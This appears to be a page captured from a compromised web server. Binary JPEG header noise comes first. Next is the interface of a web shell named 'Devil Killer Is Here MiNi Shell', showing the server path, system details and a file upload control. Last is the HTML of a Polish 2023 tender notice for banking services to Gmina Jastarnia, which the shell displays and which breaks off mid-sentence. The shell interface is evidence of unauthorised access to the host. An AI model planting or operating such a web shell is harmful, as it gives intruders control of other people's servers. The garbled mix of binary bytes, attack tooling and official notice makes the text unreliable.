JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230330/0015847701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Bankowa obsługa budżetu Gminy Jastarnia z uwzględnieniem wszystkich podległych jednostek organizacyjnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Jastarnia</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675480</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Portowa 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jastarnia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-140</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">referatrozwoju@jastarnia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.jastarnia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bankowa obsługa budżetu Gminy Jastarnia z uwzględnieniem wszystkich podległych jednostek organizacyjnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-014d6ae3-cefa-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00158477</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00032079/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Bankowa obsługa budżetu Gminy Jastarnia z uwzględnieniem wszystkich podległych jednostek organizacyjnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/jastarnia/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/jastarnia</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę,oświadczenie, o którym mowa w art 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, m.in. .doc, .odt, .ods, .docx, .txt, .xls, .pdf, .jpg,.png, .zip. Ofertę oraz oświadczenie, o którym mowa w art 125 ust. 1 ustawy Pzp składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zgodnie z art. 63 ust 2 ustawy Pzp. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują elektronicznie za pomocą portalu platformazakupowa.pl dostępnego pod adresem<br/>https://platformazakupowa.pl/pn/jastarnia i formularza ,,wyślij wiadomość do zamawiającego&#34; dostępnego na stronie dotyczącej danego postępowania (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RR.271.13.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie bankowej obsługi budżetu Gminy Jastarnia i podległych jej jednostek, tj.: <br/>- Urząd Miejski w Jastarni, z siedzibą w 84-140 Jastarnia, ul. Portowa 24, <br/> - Szkoła Podstawowa w Jastarni, z siedzibą w 84-140 Jastarnia, ul. Stelmaszczyka 4<br/> - Miejski Ośrodek Kultury, Sportu i Rekreacji w Jastarni, z siedzibą w 84-140 Jastarnia,<br/> ul. Ks. Stefańskiego 5<br/> - Miejska Biblioteka Publiczna w Jastarni, z siedzibą w 84-140 Jastarnia, ul. Portowa 24<br/> - Miejski Ośrodek Pomocy Społecznej w Jastarni, z siedzibą w 84-140 Jastarnia, ul. Portowa 24<br/> - Miejski Zarząd Portu w Jastarni z siedzibą w 84-140 Jastarnia, ul. Portowa 43.<br/><br/>Zakres usług ma obejmować:<br/>a) otwarcie, prowadzenie i likwidację rachunków bankowych: podstawowych i pomocniczych, w tym funduszy celowych;<br/>b) przyjmowanie wpłat gotówkowych własnych, w tym w formie zamkniętej bez sprawdzania zawartości oraz wpłat obcych (wpłaty podatków i opłat dokonywanych przez osoby fizyczne, prawne oraz inne podmioty);<br/>c) dokonywanie wypłat gotówkowych;<br/>d) realizację poleceń przelewów wewnętrznych (w ramach danego banku, elektronicznie i w razie potrzeb składanych papierowo);<br/>e) realizację poleceń przelewów zewnętrznych (elektronicznie i w razie potrzeb składanych papierowo) zarówno krajowych, jak i zagranicznych, w tym sorbent od wartości powyżej 1.000.000,00 zł ( słownie: jeden milion złotych);<br/>f) wydawanie blankietów czekowych lub innego dokumentu uprawniającego do wypłaty gotówki;<br/>g) zapewnienie systemu bankowości elektronicznej: zainstalowanie systemu, szkolenie osób, serwis w trakcie trwania umowy; przy realizacji przelewu wymagane dwa podpisy;<br/>h) w razie potrzeb potwierdzanie wpłat obcych dokonywanych na rachunek bieżący w oddziale banku;<br/>i) Wykonawca powinien posiadać na terenie Gminy Jastarnia w okresie realizacji umowy przynajmniej jeden oddział lub inną placówkę banku umożliwiający obsługę Zamawiającego <br/>i podległych jednostek w zakresie wskazanym w SWZ, co oświadcza w załączniku nr 1 do SWZ - Formularz ofertowy. W przypadku, gdy oddział lub placówka banku znajdująca się na terenie Gminy Jastarnia w okresie obowiązywania umowy ulegnie likwidacji lub czasowemu zamknięciu na okres dłuższy niż dwa dni, Wykonawca ma zapewnić konwojowanie środków pieniężnych realizowany przez transport Wykonawcy albo firm zewnętrznych współpracujących z Wykonawcą bez pobierania dodatkowej opłaty od Zamawiającego.	<br/><br/>W wypadku gdy Wykonawca nie posiada oddziału lub innej placówki na terenie Gminy Jastarnia, musi posiadać przynajmniej jeden oddział lub inną placówkę banku umożliwiający obsługę Zamawiającego i podległych jednostek w zakresie wskazanym w SWZ na terenie Powiatu Puckiego lub powiatów sąsiednich, tj. Powiatu Wejherowskiego lub Miasta Gdyni oraz zobowiązany jest zapewnić transport i konwojowanie środków pieniężnych realizowany przez transport Wykonawcy albo firm zewnętrznych współpracujących z Wykonawcą. Wykonawca ma zapewnić odbiór środków pieniężnych z siedziby Zamawiającego i podległych jednostek przez transport Wykonawcy albo firm zewnętrznych współpracujących z Wykonawcą, po każdorazowym zapotrzebowaniu przez Zamawiającego lub podległe jednostki za pośrednictwem poczty elektronicznej albo systemu bakowości elektronicznej Wykonawcy. Zgłoszenie takie Zamawiający lub jednostka podległa wykona z jednodniowym wyprzedzeniem. <br/><br/>Transport i konwojowanie środków pieniężnych musi odbywać się w dniu roboczym następnym po zgłoszeniu w godzinach od 7:30 do 13:00. <br/>Środki pieniężne odebrane od Zamawiającego i podległych jednostek, zostaną przetransportowane bez udziału pracowników Zamawiającego i jednostek podległych do wybranej placówki banku i w dniu odbioru zostaną wpłacone na konto Zamawiającego lub jednostek podległych.<br/>Szacunkowa liczba konwojów środków pieniężnych z siedziby Zamawiającego i jednostek podległych w okresie trwania umowy wyniesie około :<br/>- 280 razy dla Urzędu Miejskiego w Jastarni, ul. Portowa 24,<br/>- 240 razy dla Miejskiego Zarządu Portu w Jastarni, ul. Portowa 43<br/>- 40 razy dla Szkoły Podstawowej w Jastarni, ul. Stelmaszczyka 4.<br/>Zamawiający informuje, że ¾ liczby konwojów, które wskazuje Zamawiający realizowane będzie corocznie w okresie od czerwca do września. Transport i konwojowanie środków pieniężnych Zamawiającego i jednostek podległych musi odbywać się w dni robocze, we wskazanych w SWZ godzinach.<br/><br/>j) przyjmowanie lokat krótkoterminowych,<br/>k) możliwość udzielenia w ciągu roku kredytu w rachunku bieżącym na pokrycie występującego w trakcie roku przejściowego deficytu budżetu (dodatkowa coroczna umowa) po pozytywnej ocenie zdolności kredytowej Zamawiającego w oparciu o złożony wniosek o udzielenie kredytu wraz z załącznikami wymaganymi przez Bank; wysokość kredytu ustalona uchwałą na dany rok budżetowy; oprocentowanie kredytu według zmiennej stopy procentowej w oparciu o stawkę WIBOR O/N plus marża banku niezmienna w całym okresie trwania umowy kredytowej; aktualizacja stawki bazowej WIBOR następować będzie każdego dnia.<br/> W przypadku znaczącej zmiany lub zaprzestania opracowywania stawki bazowej, o której mowa w ust. 1 (dotyczy WIBOR). Bank od następnego dnia roboczego opiera formułę służącą do ustalania oprocentowania odpowiednio o zmienioną lub zastępczą stawkę bazową. Ustalając zastępczą stawkę bazową oraz nową formułę oprocentowania Bank weźmie pod uwagę spełnienie następujących kryteriów adekwatności: zgodność walut z dotychczasową stawką, odzwierciedlenie wartości pieniądza w czasie, powszechność stosowania na polskim rynku. Bank powiadomi pisemnie Kredytobiorcę, poręczyciela oraz inne osoby będące dłużnikami Banku z tytułu zabezpieczenia Kredytu, o istotnej zmianie lub ustaleniu zastępczej stawki bazowej wraz ze wskazaniem miejsca publikacji stawki zastępczej i firmy administratora. <br/>W przypadku braku możliwości ustalenia i stosowania zastępczej stawki bazowej, od następnego dnia roboczego po zaprzestaniu opracowywania stawki bazowej do dnia ustalenia zastępczej stawki bazowej, oprocentowanie wyliczane będzie na podstawie ostatniej dostępnej stawki bazowej. Bank powiadomi pisemnie Kredytobiorcę, poręczyciela oraz inne osoby będące dłużnikami Banku z tytułu zabezpieczenia Kredytu o ustaleniu zastępczej stawki bazowej wraz ze wskazaniem miejsca publikacji stawki zastępczej i firm.” Zabezpieczenie kredytu jedynie poprzez wystawienie weksla własnego in blanco przez wystawcę – Gminę Jastarnia z kontrasygnatą Skarbnika. W przypadku udzielenia kredytu na okres krótszy niż 12 miesięcy prowizja za uruchomienie kredytu naliczana zostanie proporcjonalnie do okresu na jaki udzielony zostanie kredyt (liczba miesięcy). Przykładowo: jako należne brane do proporcji, Zamawiający przyjmuje naliczenie za miesiąc, w którym została podpisana umowa kredytowa, np. umowa została podpisana w kwietniu oznacza to, że prowizja naliczona zostanie za 9 miesięcy. <br/><br/>2. Zamawiający nie dopuszcza możliwości pobierania opłat, prowizji bankowych oraz naliczania przez Wykonawcę opłat:<br/>a) od wpłat i wypłat gotówkowych dokonywanych przez poszczególnych Zamawiających,<br/>b) wystawianie i zmiany karty wzorów podpisów,<br/>c) wpłat gotówkowych osób trzecich na rzecz poszczególnych Zamawiających,<br/>d) wpłat dokonywanych na konta poszczególnych Zamawiających w walucie obcej oraz wpłat dokonywanych przez osoby trzecie,<br/>e) od transportu i konwojowania środków pieniężnych zgodnie z pkt 4.1.i) niniejszej SWZ oraz <br/>f) wydawaniu opinii bankowych i zaświadczeń na wniosek poszczególnych Zamawiających<br/>g) przyjęcia depozytu,<br/>h) korzystania z systemu bankowości elektronicznej, w tym za szkolenia, o których mowa w pkt. 4.1.g). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66110000-4 - Usługi bankowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66120000-7 - Inwestycyjne usługi bankowe i usługi powiązane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">48 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">oprocentowanie rachunków bankowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">prowizja za uruchomienie kredytu w rachunku bieżącym gminy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Prowadzenie placówki na terenie m. Gminy Jastarnia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> -uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>a)	Warunek zostanie spełniony , jeżeli Wykonawca wykaże, iż posiada aktualne Komisji Nadzoru Finansowego na prowadzenie działalności bankowej na terenie Rzeczpospolitej Polskiej, o której mowa w art. 36 ustawy z dnia 29 sierpnia 1997 r. prawo bankowe (tj. Dz.U. z 2020 r. poz. 1896 z późn. zm.) lub inny dokument, na podstawie którego prowadzona jest działalność bankowa w zakresie przedmiotu niniejszego zamówienia, zgodnie z Prawem bankowym.<br/>-zdolności technicznej lub zawodowej- Wykonawca spełni warunek, jeżeli wykażą, że:<br/> - w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia wykonali lub wykonują przynajmniej jedną usługę bankowej obsługi budżetu jednostki samorządu terytorialnego, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie i załączą dokumenty potwierdzające, że usługa ta została bądź jest wykonywana w tym okresie należycie;<br/>- posiada:<br/>1.Na terenie Gminy Jastarnia placówkę lub oddział banku umożliwiający obsługę Zamawiającego i podległych jednostek w zakresie wskazanym w SWZ; <br/>albo<br/>2. Przynajmniej jeden oddział lub inną placówkę banku na terenie Powiatu Puckiego lub powiatów sąsiednich, tj. Powiatu Wejherowskiego lub Miasta Gdyni oraz zapewnia transport i konwojowanie środków pieniężnych realizowane przez transport Wykonawcy albo firm zewnętrznych współpracujących z Wykonawcą. Wykonawca ma zapewnić odbiór środków pieniężnych z siedziby Zamawiającego i podległych jednostek przez transport Wykonawcy albo firm zewnętrznych współpracujących z Wykonawcą, po każdorazowym zgłoszeniu przez Zamawiającego lub podległe jednostki za pośrednictwem poczty elektronicznej. Transport i konwojowanie winno odbywać się zgodnie z przepisami rozporządzenia Ministra Spraw Wewnętrznych i Administracji w sprawie zasad i wymagań , jakimi powinna odpowiadać ochrona wartości pieniężnych przechowywanych <br/>i transportowanych przez przedsiębiorców i inne jednostki organizacyjne. Transport i konwojowanie środków pieniężnych musi odbywać się w następnym po zgłoszeniu dniu roboczym w godzinach od 7:30 do 13:00. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">c) oświadczenie w zakresie<br/>art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową<br/>lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postepowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;<br/>d) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)wykaz usług wykonanych (jeden wspólny wykaz w przypadku Wykonawców składających ofertę wspólną – sporządzony według<br/>załącznika nr 5 do SWZ), a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3<br/>lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz, których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi<br/>zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty przez<br/>podmiot, na rzecz, którego usługi zostały wykonane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku<br/>świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte<br/>wykonanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/>b) oświadczenie o posiadaniu oddziału lub placówki banku na terenie Gminy Jastarnia lub o gwarantowanym przez Wykonawcę transporcie i konwojowaniu wartości pieniężnych z siedziby Zamawiającego i podległych jednostek do Banku</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich 